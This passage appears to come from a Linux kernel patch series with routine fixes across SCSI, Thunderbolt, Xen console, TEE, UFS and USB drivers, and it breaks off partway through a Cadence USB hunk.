+index 6e33dc16ce6f3..7d2d872bae3c5 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -360,6 +360,13 @@ MODULE_PARM_DESC(ql2xnvme_queues,
+ 	"1 - Minimum number of queues supported\n"
+ 	"8 - Default value");
+ 
++int ql2xfc2target = 1;
++module_param(ql2xfc2target, int, 0444);
++MODULE_PARM_DESC(qla2xfc2target,
++		  "Enables FC2 Target support. "
++		  "0 - FC2 Target support is disabled. "
++		  "1 - FC2 Target support is enabled (default).");
++
+ static struct scsi_transport_template *qla2xxx_transport_template = NULL;
+ struct scsi_transport_template *qla2xxx_transport_vport_template = NULL;
+ 
+@@ -1848,6 +1855,17 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
++			/*
++			 * perform lockless completion during driver unload
++			 */
++			if (qla2x00_chip_is_down(vha)) {
++				req->outstanding_cmds[cnt] = NULL;
++				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++				sp->done(sp, res);
++				spin_lock_irqsave(qp->qp_lock_ptr, flags);
++				continue;
++			}
++
+ 			switch (sp->cmd_type) {
+ 			case TYPE_SRB:
+ 				qla2x00_abort_srb(qp, sp, res, &flags);
+@@ -4076,7 +4094,8 @@ qla2x00_mark_all_devices_lost(scsi_qla_host_t *vha)
+ 	    "Mark all dev lost\n");
+ 
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list) {
+-		if (fcport->loop_id != FC_NO_LOOP_ID &&
++		if (ql2xfc2target &&
++		    fcport->loop_id != FC_NO_LOOP_ID &&
+ 		    (fcport->flags & FCF_FCP2_DEVICE) &&
+ 		    fcport->port_type == FCT_TARGET &&
+ 		    !qla2x00_reset_active(vha)) {
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index bc9d280417f6a..3fcaf10a9dfe7 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -234,6 +234,7 @@ static struct {
+ 	{"SGI", "RAID5", "*", BLIST_SPARSELUN},
+ 	{"SGI", "TP9100", "*", BLIST_REPORTLUN2},
+ 	{"SGI", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
++	{"SKhynix", "H28U74301AMR", NULL, BLIST_SKIP_VPD_PAGES},
+ 	{"IBM", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"SUN", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"DELL", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 55d6fb4526804..a0665bca54b99 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -987,6 +987,22 @@ static void storvsc_handle_error(struct vmscsi_request *vm_srb,
+ 				goto do_work;
+ 			}
+ 
++			/*
++			 * Check for "Operating parameters have changed"
++			 * due to Hyper-V changing the VHD/VHDX BlockSize
++			 * when adding/removing a differencing disk. This
++			 * causes discard_granularity to change, so do a
++			 * rescan to pick up the new granularity. We don't
++			 * want scsi_report_sense() to output a message
++			 * that a sysadmin wouldn't know what to do with.
++			 */
++			if ((asc == 0x3f) && (ascq != 0x03) &&
++					(ascq != 0x0e)) {
++				process_err_fn = storvsc_device_scan;
++				set_host_byte(scmnd, DID_REQUEUE);
++				goto do_work;
++			}
++
+ 			/*
+ 			 * Otherwise, let upper layer deal with the
+ 			 * error when sense message is present
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 82c3cfdcc5601..9c6cf2f5d77ce 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -170,9 +170,9 @@ static const struct llcc_slice_config sc8280xp_data[] = {
+ 	{ LLCC_CVP,      28, 512,  3, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+ 	{ LLCC_APTCM,    30, 1024, 3, 1, 0x0,   0x1, 1, 0, 0, 1, 0, 0 },
+ 	{ LLCC_WRCACHE,  31, 1024, 1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+-	{ LLCC_CVPFW,    32, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUSS1,   33, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUHWT,   36, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
++	{ LLCC_CVPFW,    17, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUSS1,   3, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUHWT,   5, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+ };
+ 
+ static const struct llcc_slice_config sdm845_data[] =  {
+diff --git a/drivers/target/iscsi/iscsi_target_parameters.c b/drivers/target/iscsi/iscsi_target_parameters.c
+index 2317fb077db0e..557516c642c3b 100644
+--- a/drivers/target/iscsi/iscsi_target_parameters.c
++++ b/drivers/target/iscsi/iscsi_target_parameters.c
+@@ -1262,18 +1262,20 @@ static struct iscsi_param *iscsi_check_key(
+ 		return param;
+ 
+ 	if (!(param->phase & phase)) {
+-		pr_err("Key \"%s\" may not be negotiated during ",
+-				param->name);
++		char *phase_name;
++
+ 		switch (phase) {
+ 		case PHASE_SECURITY:
+-			pr_debug("Security phase.\n");
++			phase_name = "Security";
+ 			break;
+ 		case PHASE_OPERATIONAL:
+-			pr_debug("Operational phase.\n");
++			phase_name = "Operational";
+ 			break;
+ 		default:
+-			pr_debug("Unknown phase.\n");
++			phase_name = "Unknown";
+ 		}
++		pr_err("Key \"%s\" may not be negotiated during %s phase.\n",
++				param->name, phase_name);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 297dc62bca298..372d64756ed64 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -267,35 +267,34 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		goto out;
+ 	}
+ 
++	/* Open session with loaded TA */
++	handle_open_session(arg, &session_info, param);
++	if (arg->ret != TEEC_SUCCESS) {
++		pr_err("open_session failed %d\n", arg->ret);
++		handle_unload_ta(ta_handle);
++		kref_put(&sess->refcount, destroy_session);
++		goto out;
++	}
++
+ 	/* Find an empty session index for the given TA */
+ 	spin_lock(&sess->lock);
+ 	i = find_first_zero_bit(sess->sess_mask, TEE_NUM_SESSIONS);
+-	if (i < TEE_NUM_SESSIONS)
++	if (i < TEE_NUM_SESSIONS) {
++		sess->session_info[i] = session_info;
++		set_session_id(ta_handle, i, &arg->session);
+ 		set_bit(i, sess->sess_mask);
++	}
+ 	spin_unlock(&sess->lock);
+ 
+ 	if (i >= TEE_NUM_SESSIONS) {
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
++		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+ 		kref_put(&sess->refcount, destroy_session);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	/* Open session with loaded TA */
+-	handle_open_session(arg, &session_info, param);
+-	if (arg->ret != TEEC_SUCCESS) {
+-		pr_err("open_session failed %d\n", arg->ret);
+-		spin_lock(&sess->lock);
+-		clear_bit(i, sess->sess_mask);
+-		spin_unlock(&sess->lock);
+-		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
+-		goto out;
+-	}
+-
+-	sess->session_info[i] = session_info;
+-	set_session_id(ta_handle, i, &arg->session);
+ out:
+ 	free_pages((u64)ta, get_order(ta_size));
+ 	return rc;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index 834bcad42e9fe..d89f92032c1c2 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -942,7 +942,8 @@ static void margining_port_remove(struct tb_port *port)
+ 
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+-	debugfs_remove_recursive(debugfs_lookup("margining", parent));
++	if (parent)
++		debugfs_remove_recursive(debugfs_lookup("margining", parent));
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
+@@ -967,19 +968,18 @@ static void margining_switch_init(struct tb_switch *sw)
+ 
+ static void margining_switch_remove(struct tb_switch *sw)
+ {
++	struct tb_port *upstream, *downstream;
+ 	struct tb_switch *parent_sw;
+-	struct tb_port *downstream;
+ 	u64 route = tb_route(sw);
+ 
+ 	if (!route)
+ 		return;
+ 
+-	/*
+-	 * Upstream is removed with the router itself but we need to
+-	 * remove the downstream port margining directory.
+-	 */
++	upstream = tb_upstream_port(sw);
+ 	parent_sw = tb_switch_parent(sw);
+ 	downstream = tb_port_at(route, parent_sw);
++
++	margining_port_remove(upstream);
+ 	margining_port_remove(downstream);
+ }
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4dce2edd86ea0..cfebec107f3fc 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -46,7 +46,7 @@
+ #define QUIRK_AUTO_CLEAR_INT	BIT(0)
+ #define QUIRK_E2E		BIT(1)
+ 
+-static int ring_interrupt_index(struct tb_ring *ring)
++static int ring_interrupt_index(const struct tb_ring *ring)
+ {
+ 	int bit = ring->hop;
+ 	if (!ring->is_tx)
+@@ -63,13 +63,14 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+ 	int reg = REG_RING_INTERRUPT_BASE +
+ 		  ring_interrupt_index(ring) / 32 * 4;
+-	int bit = ring_interrupt_index(ring) & 31;
+-	int mask = 1 << bit;
++	int interrupt_bit = ring_interrupt_index(ring) & 31;
++	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+ 
+ 	if (ring->irq > 0) {
+ 		u32 step, shift, ivr, misc;
+ 		void __iomem *ivr_base;
++		int auto_clear_bit;
+ 		int index;
+ 
+ 		if (ring->is_tx)
+@@ -77,18 +78,25 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 		else
+ 			index = ring->hop + ring->nhi->hop_count;
+ 
+-		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
+-			/*
+-			 * Ask the hardware to clear interrupt status
+-			 * bits automatically since we already know
+-			 * which interrupt was triggered.
+-			 */
+-			misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
+-			if (!(misc & REG_DMA_MISC_INT_AUTO_CLEAR)) {
+-				misc |= REG_DMA_MISC_INT_AUTO_CLEAR;
+-				iowrite32(misc, ring->nhi->iobase + REG_DMA_MISC);
+-			}
+-		}
++		/*
++		 * Intel routers support a bit that isn't part of
++		 * the USB4 spec to ask the hardware to clear
++		 * interrupt status bits automatically since
++		 * we already know which interrupt was triggered.
++		 *
++		 * Other routers explicitly disable auto-clear
++		 * to prevent conditions that may occur where two
++		 * MSIX interrupts are simultaneously active and
++		 * reading the register clears both of them.
++		 */
++		misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
++		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++			auto_clear_bit = REG_DMA_MISC_INT_AUTO_CLEAR;
++		else
++			auto_clear_bit = REG_DMA_MISC_DISABLE_AUTO_CLEAR;
++		if (!(misc & auto_clear_bit))
++			iowrite32(misc | auto_clear_bit,
++				  ring->nhi->iobase + REG_DMA_MISC);
+ 
+ 		ivr_base = ring->nhi->iobase + REG_INT_VEC_ALLOC_BASE;
+ 		step = index / REG_INT_VEC_ALLOC_REGS * REG_INT_VEC_ALLOC_BITS;
+@@ -108,7 +116,7 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 
+ 	dev_dbg(&ring->nhi->pdev->dev,
+ 		"%s interrupt at register %#x bit %d (%#x -> %#x)\n",
+-		active ? "enabling" : "disabling", reg, bit, old, new);
++		active ? "enabling" : "disabling", reg, interrupt_bit, old, new);
+ 
+ 	if (new == old)
+ 		dev_WARN(&ring->nhi->pdev->dev,
+@@ -393,14 +401,17 @@ EXPORT_SYMBOL_GPL(tb_ring_poll_complete);
+ 
+ static void ring_clear_msix(const struct tb_ring *ring)
+ {
++	int bit;
++
+ 	if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+ 		return;
+ 
++	bit = ring_interrupt_index(ring) & 31;
+ 	if (ring->is_tx)
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE);
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR);
+ 	else
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE +
+-			 4 * (ring->nhi->hop_count / 32));
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR +
++			  4 * (ring->nhi->hop_count / 32));
+ }
+ 
+ static irqreturn_t ring_msix(int irq, void *data)
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index 0d4970dcef842..faef165a919cc 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -77,12 +77,13 @@ struct ring_desc {
+ 
+ /*
+  * three bitfields: tx, rx, rx overflow
+- * Every bitfield contains one bit for every hop (REG_HOP_COUNT). Registers are
+- * cleared on read. New interrupts are fired only after ALL registers have been
++ * Every bitfield contains one bit for every hop (REG_HOP_COUNT).
++ * New interrupts are fired only after ALL registers have been
+  * read (even those containing only disabled rings).
+  */
+ #define REG_RING_NOTIFY_BASE	0x37800
+ #define RING_NOTIFY_REG_COUNT(nhi) ((31 + 3 * nhi->hop_count) / 32)
++#define REG_RING_INT_CLEAR	0x37808
+ 
+ /*
+  * two bitfields: rx, tx
+@@ -105,6 +106,7 @@ struct ring_desc {
+ 
+ #define REG_DMA_MISC			0x39864
+ #define REG_DMA_MISC_INT_AUTO_CLEAR     BIT(2)
++#define REG_DMA_MISC_DISABLE_AUTO_CLEAR	BIT(17)
+ 
+ #define REG_INMAIL_DATA			0x39900
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index b5f2ec79c4d6e..ae28a03fa890b 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -20,6 +20,12 @@ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_clx_disable(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_NO_CLX;
++	tb_sw_dbg(sw, "disabling CL states\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -37,6 +43,13 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
++	 */
++	{ 0x0438, 0x0208, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x0209, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020a, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020b, 0x0000, 0x0000, quirk_clx_disable },
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 56008eb91e2e4..9cc28197dbc45 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,22 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_set_inbound_sbtx(port, i);
++}
++
++static void tb_retimer_unset_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = TB_MAX_RETIMER_INDEX; i >= 1; i--)
++		usb4_port_retimer_unset_inbound_sbtx(port, i);
++}
++
+ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	struct device_attribute *attr, const char *buf, size_t count)
+ {
+@@ -213,6 +229,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	rt->auth_status = 0;
+ 
+ 	if (val) {
++		tb_retimer_set_inbound_sbtx(rt->port);
+ 		if (val == AUTHENTICATE_ONLY) {
+ 			ret = tb_retimer_nvm_authenticate(rt, true);
+ 		} else {
+@@ -232,6 +249,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	}
+ 
+ exit_unlock:
++	tb_retimer_unset_inbound_sbtx(rt->port);
+ 	mutex_unlock(&rt->tb->lock);
+ exit_rpm:
+ 	pm_runtime_mark_last_busy(&rt->dev);
+@@ -440,8 +458,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 * Enable sideband channel for each retimer. We can do this
+ 	 * regardless whether there is device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_set_inbound_sbtx(port, i);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	/*
+ 	 * Before doing anything else, read the authentication status.
+@@ -464,6 +481,8 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
++	tb_retimer_unset_inbound_sbtx(port);
++
+ 	if (!last_idx)
+ 		return 0;
+ 
+diff --git a/drivers/thunderbolt/sb_regs.h b/drivers/thunderbolt/sb_regs.h
+index 5185cf3e4d978..f37a4320f10a5 100644
+--- a/drivers/thunderbolt/sb_regs.h
++++ b/drivers/thunderbolt/sb_regs.h
+@@ -20,6 +20,7 @@ enum usb4_sb_opcode {
+ 	USB4_SB_OPCODE_ROUTER_OFFLINE = 0x4e45534c,		/* "LSEN" */
+ 	USB4_SB_OPCODE_ENUMERATE_RETIMERS = 0x4d554e45,		/* "ENUM" */
+ 	USB4_SB_OPCODE_SET_INBOUND_SBTX = 0x5055534c,		/* "LSUP" */
++	USB4_SB_OPCODE_UNSET_INBOUND_SBTX = 0x50555355,		/* "USUP" */
+ 	USB4_SB_OPCODE_QUERY_LAST_RETIMER = 0x5453414c,		/* "LAST" */
+ 	USB4_SB_OPCODE_GET_NVM_SECTOR_SIZE = 0x53534e47,	/* "GNSS" */
+ 	USB4_SB_OPCODE_NVM_SET_OFFSET = 0x53504f42,		/* "BOPS" */
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 60da5c23ccaf4..9699d167d522d 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2959,8 +2959,6 @@ int tb_switch_add(struct tb_switch *sw)
+ 			dev_warn(&sw->dev, "reading DROM failed: %d\n", ret);
+ 		tb_sw_dbg(sw, "uid: %#llx\n", sw->uid);
+ 
+-		tb_check_quirks(sw);
+-
+ 		ret = tb_switch_set_uuid(sw);
+ 		if (ret) {
+ 			dev_err(&sw->dev, "failed to set UUID\n");
+@@ -2979,6 +2977,8 @@ int tb_switch_add(struct tb_switch *sw)
+ 			}
+ 		}
+ 
++		tb_check_quirks(sw);
++
+ 		tb_switch_default_link_ports(sw);
+ 
+ 		ret = tb_switch_update_link_attributes(sw);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f9786976f5ecf..e11d973a8f9b6 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -23,6 +23,11 @@
+ #define NVM_MAX_SIZE		SZ_512K
+ #define NVM_DATA_DWORDS		16
+ 
++/* Keep link controller awake during update */
++#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
++/* Disable CLx if not supported */
++#define QUIRK_NO_CLX					BIT(1)
++
+ /**
+  * struct tb_nvm - Structure holding NVM information
+  * @dev: Owner of the NVM
+@@ -997,6 +1002,9 @@ static inline bool tb_switch_is_clx_enabled(const struct tb_switch *sw,
+  */
+ static inline bool tb_switch_is_clx_supported(const struct tb_switch *sw)
+ {
++	if (sw->quirks & QUIRK_NO_CLX)
++		return false;
++
+ 	return tb_switch_is_usb4(sw) || tb_switch_is_titan_ridge(sw);
+ }
+ 
+@@ -1212,6 +1220,7 @@ int usb4_port_sw_margin(struct tb_port *port, unsigned int lanes, bool timing,
+ int usb4_port_sw_margin_errors(struct tb_port *port, u32 *errors);
+ 
+ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index);
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index);
+ int usb4_port_retimer_read(struct tb_port *port, u8 index, u8 reg, void *buf,
+ 			   u8 size);
+ int usb4_port_retimer_write(struct tb_port *port, u8 index, u8 reg,
+@@ -1254,9 +1263,6 @@ struct usb4_port *usb4_port_device_add(struct tb_port *port);
+ void usb4_port_device_remove(struct usb4_port *usb4);
+ int usb4_port_device_resume(struct usb4_port *usb4);
+ 
+-/* Keep link controller awake during update */
+-#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+-
+ void tb_check_quirks(struct tb_switch *sw);
+ 
+ #ifdef CONFIG_ACPI
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index f986854aa207a..cf8d4f769579e 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1561,6 +1561,20 @@ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index)
+ 				    500);
+ }
+ 
++/**
++ * usb4_port_retimer_unset_inbound_sbtx() - Disable sideband channel transactions
++ * @port: USB4 port
++ * @index: Retimer index
++ *
++ * Disables sideband channel transations on SBTX. The reverse of
++ * usb4_port_retimer_set_inbound_sbtx().
++ */
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index)
++{
++	return usb4_port_retimer_op(port, index,
++				    USB4_SB_OPCODE_UNSET_INBOUND_SBTX, 500);
++}
++
+ /**
+  * usb4_port_retimer_read() - Read from retimer sideband registers
+  * @port: USB4 port
+@@ -2050,18 +2064,30 @@ static int usb4_usb3_port_write_allocated_bandwidth(struct tb_port *port,
+ 						    int downstream_bw)
+ {
+ 	u32 val, ubw, dbw, scale;
+-	int ret;
++	int ret, max_bw;
+ 
+-	/* Read the used scale, hardware default is 0 */
+-	ret = tb_port_read(port, &scale, TB_CFG_PORT,
+-			   port->cap_adap + ADP_USB3_CS_3, 1);
++	/* Figure out suitable scale */
++	scale = 0;
++	max_bw = max(upstream_bw, downstream_bw);
++	while (scale < 64) {
++		if (mbps_to_usb3_bw(max_bw, scale) < 4096)
++			break;
++		scale++;
++	}
++
++	if (WARN_ON(scale >= 64))
++		return -EINVAL;
++
++	ret = tb_port_write(port, &scale, TB_CFG_PORT,
++			    port->cap_adap + ADP_USB3_CS_3, 1);
+ 	if (ret)
+ 		return ret;
+ 
+-	scale &= ADP_USB3_CS_3_SCALE_MASK;
+ 	ubw = mbps_to_usb3_bw(upstream_bw, scale);
+ 	dbw = mbps_to_usb3_bw(downstream_bw, scale);
+ 
++	tb_port_dbg(port, "scaled bandwidth %u/%u, scale %u\n", ubw, dbw, scale);
++
+ 	ret = tb_port_read(port, &val, TB_CFG_PORT,
+ 			   port->cap_adap + ADP_USB3_CS_2, 1);
+ 	if (ret)
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 37809c6c027fc..d9d0232753286 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -43,6 +43,7 @@ struct xencons_info {
+ 	int irq;
+ 	int vtermno;
+ 	grant_ref_t gntref;
++	spinlock_t ring_lock;
+ };
+ 
+ static LIST_HEAD(xenconsoles);
+@@ -89,12 +90,15 @@ static int __write_console(struct xencons_info *xencons,
+ 	XENCONS_RING_IDX cons, prod;
+ 	struct xencons_interface *intf = xencons->intf;
+ 	int sent = 0;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->out_cons;
+ 	prod = intf->out_prod;
+ 	mb();			/* update queue values before going on */
+ 
+ 	if ((prod - cons) > sizeof(intf->out)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -104,6 +108,7 @@ static int __write_console(struct xencons_info *xencons,
+ 
+ 	wmb();			/* write ring before updating pointer */
+ 	intf->out_prod = prod;
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 
+ 	if (sent)
+ 		notify_daemon(xencons);
+@@ -146,16 +151,19 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 	int recv = 0;
+ 	struct xencons_info *xencons = vtermno_to_xencons(vtermno);
+ 	unsigned int eoiflag = 0;
++	unsigned long flags;
+ 
+ 	if (xencons == NULL)
+ 		return -EINVAL;
+ 	intf = xencons->intf;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->in_cons;
+ 	prod = intf->in_prod;
+ 	mb();			/* get pointers before reading ring */
+ 
+ 	if ((prod - cons) > sizeof(intf->in)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -179,10 +187,13 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 		xencons->out_cons = intf->out_cons;
+ 		xencons->out_cons_same = 0;
+ 	}
++	if (!recv && xencons->out_cons_same++ > 1) {
++		eoiflag = XEN_EOI_FLAG_SPURIOUS;
++	}
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
++
+ 	if (recv) {
+ 		notify_daemon(xencons);
+-	} else if (xencons->out_cons_same++ > 1) {
+-		eoiflag = XEN_EOI_FLAG_SPURIOUS;
+ 	}
+ 
+ 	xen_irq_lateeoi(xencons->irq, eoiflag);
+@@ -239,6 +250,7 @@ static int xen_hvm_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	} else if (info->intf != NULL) {
+ 		/* already configured */
+ 		return 0;
+@@ -275,6 +287,7 @@ err:
+ 
+ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ {
++	spin_lock_init(&info->ring_lock);
+ 	info->evtchn = xen_start_info->console.domU.evtchn;
+ 	/* GFN == MFN for PV guest */
+ 	info->intf = gfn_to_virt(xen_start_info->console.domU.mfn);
+@@ -325,6 +338,7 @@ static int xen_initial_domain_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	}
+ 
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+@@ -482,6 +496,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 	if (!info)
+ 		return -ENOMEM;
++	spin_lock_init(&info->ring_lock);
+ 	dev_set_drvdata(&dev->dev, info);
+ 	info->xbdev = dev;
+ 	info->vtermno = xenbus_devid_to_vtermno(devid);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index edd34dac91b1d..d89ce7fb6b363 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -10074,4 +10074,5 @@ module_exit(ufshcd_core_exit);
+ MODULE_AUTHOR("Santosh Yaragnavi <santosh.sy@samsung.com>");
+ MODULE_AUTHOR("Vinayak Holikatti <h.vinayak@samsung.com>");
+ MODULE_DESCRIPTION("Generic UFS host controller driver Core");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/usb/cdns3/cdns3-pci-wrap.c b/drivers/usb/cdns3/cdns3-pci-wrap.c
+index deeea618ba33b..1f6320d98a76b 100644
+--- a/drivers/usb/cdns3/cdns3-pci-wrap.c
++++ b/drivers/usb/cdns3/cdns3-pci-wrap.c
+@@ -60,6 +60,11 @@ static struct pci_dev *cdns3_get_second_fun(struct pci_dev *pdev)
+ 			return NULL;
+ 	}
+ 
++	if (func->devfn != PCI_DEV_FN_HOST_DEVICE &&
++	    func->devfn != PCI_DEV_FN_OTG) {
++		return NULL;
++	}
++
+ 	return func;
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index 9b8325f824992..d63d5d92f2554 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -403,20 +403,6 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ 	case USB_REQ_SET_ISOCH_DELAY:
+ 		ret = cdnsp_ep0_set_isoch_delay(pdev, ctrl);
+ 		break;
+-	case USB_REQ_SET_INTERFACE:
+-		/*
+-		 * Add request into pending list to block sending status stage
+-		 * by libcomposite.
+-		 */
+-		list_add_tail(&pdev->ep0_preq.list,
+-			      &pdev->ep0_preq.pep->pending_list);
+-
